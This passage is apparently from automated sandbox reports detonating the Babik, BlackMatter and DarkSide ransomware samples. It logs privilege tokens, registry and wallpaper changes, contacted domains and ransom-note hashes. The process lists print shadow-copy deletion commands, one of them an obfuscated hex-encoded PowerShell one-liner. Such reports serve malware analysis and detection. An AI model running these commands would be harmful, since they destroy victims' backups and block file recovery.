N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babik_04_01_2021_31KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 58.189.79.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 112.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 19.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

\Device\HarddiskVolume1\Boot\da-DK\How To Restore Your Files.txt

MD5 b6e97028103bc6b18214f4b2bd0e0d23
SHA1 4c202c77782d55af635c28fa71b2ba58b294415e
SHA256 db1c8cafdedfc4be8dd6b81aa086b998ae49ad929b8a260d4030c7b5ca373a45
SHA512 214f7e9354a76f031bc3d28c6c20b3d5fafed32e5cb2d7414b7c2d185637d2f47e3538b62c722ba8b018cb3e6e3d9ff11bd6437d3f2af8eca9cd8504eb8c0f7d

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5 7c39bb1f4920be2be02ae6ad4fefd614
SHA1 3fe56e7fcbde259aba45ad36c95265bb0d3746ab
SHA256 b5a0040ff5d4baccac5aff5b5fe8526f5846bf393ba6bc9c393f15a8a04a75ae
SHA512 1af7546ca3565087412d9640a81a20e51e0cc01c9399a0f602f72593e950715ac46a32de0b9e234e352debfb967a2c00bba8b711ae8dc7cfc3935d6e78107568

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\TempState\StartUnifiedTileModelCache.dat

MD5 931cfaf9eaab8a1c9aaeeb81c308b20b
SHA1 61f5233b87497ca7db82b65cc8b7859543bf401a
SHA256 8860ba65755bc59c3068fd49262d3e95050741284a1969dd9b3aa45adf152b1b
SHA512 885d124cce3056bc2d4aa2669219d4b40249bb5eaec2630974763881ff3633d455582cc5a66697f96fdad2424ed7b20595c1793cd46c6b8acd5721fe3c1f53fd

Analysis: behavioral12

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1778s

Max time network

1153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

Signatures

BlackMatter Ransomware

ransomware blackmatter

Renames multiple (153) files with added filename extension

ransomware

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\YgLqz8iqA.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\YgLqz8iqA.bmp" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\International C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2494989678-839960665-2515455429-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\BlackMatter_02_08_2021_67KB.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 paymenthacks.com udp
US 204.11.56.48:443 paymenthacks.com tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 204.11.56.48:80 paymenthacks.com tcp
US 8.8.8.8:53 mojobiden.com udp
US 15.197.148.33:443 mojobiden.com tcp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 48.56.11.204.in-addr.arpa udp
US 8.8.8.8:53 33.148.197.15.in-addr.arpa udp
US 8.8.8.8:53 36.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 101.58.20.217.in-addr.arpa udp
US 15.197.148.33:80 mojobiden.com tcp
US 204.11.56.48:443 paymenthacks.com tcp
US 204.11.56.48:80 paymenthacks.com tcp
US 15.197.148.33:443 mojobiden.com tcp
US 15.197.148.33:80 mojobiden.com tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 131.72.42.20.in-addr.arpa udp

Files

memory/4484-1-0x0000000002E70000-0x0000000002E80000-memory.dmp

memory/4484-0-0x0000000002E70000-0x0000000002E80000-memory.dmp

C:\YgLqz8iqA.README.txt

MD5 f66968c47a64569e2281f65a95991be0
SHA1 ef9e3e80bfbea4c3021b226cb8cd00687013b8a8
SHA256 4b950c763006e7c4569df8742855cec31bf82f835bd7e2bdcb5f128db34c82bf
SHA512 cb4ace1b3e891ab100b3950c6bc133b216e91c8978a3af1ffd75617b606bb7ceb0133f44d37a30a827655e5b84b016d736a732f5f37635bb727e1a5b722cad24

memory/4484-227-0x0000000002E70000-0x0000000002E80000-memory.dmp

memory/4484-226-0x0000000002E70000-0x0000000002E80000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1560s

Max time network

1578s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (153) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f0e1586e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f0e1586e.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\f0e1586e.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.f0e1586e\ = "f0e1586e" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\f0e1586e\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 catsdegree.com udp
US 13.248.169.48:443 catsdegree.com tcp
US 8.8.8.8:53 11.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 1.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 84.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 10.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 72.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 30.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 28.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 26.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 22.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 20.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 18.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 16.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 14.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 12.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 6.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 4.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 0.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 29.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 35.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 33.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 31.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 19.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 17.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 15.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 9.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 25.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 27.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 34.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 32.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 7.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 78.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 76.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 74.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 83.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 79.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 73.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 80.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 86.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 92.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 94.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 101.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 105.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 107.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 117.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 119.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 123.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 125.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 82.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 89.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 93.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 97.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 100.0.127.10.in-addr.arpa udp
